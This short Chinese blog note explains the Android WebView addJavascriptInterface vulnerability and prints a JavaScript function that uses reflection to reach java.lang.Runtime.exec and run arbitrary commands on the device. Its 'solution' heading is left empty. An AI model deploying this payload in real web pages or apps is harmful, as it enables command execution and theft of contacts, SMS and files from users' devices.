标签:
一.addjavascriptInterface接口引起的漏洞
参考:http://blog.csdn.net/leehong2005/article/details/11808557/
说明:
js 注入方法addJavascriptInterface可能导致不安全,因为JS可能包含恶意代码。通过JavaScript,可以访问当前设备的SD卡上面的任何东西,甚至是联系人信息,短信等。
function execute(cmdArgs) { for (var obj in window) { if ("getClass" in window[obj]) { alert(obj); return window[obj].getClass().forName("java.lang.Runtime") .getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs); } } }
解决方案:
标签:
原文地址:http://www.cnblogs.com/wjw334/p/5466340.html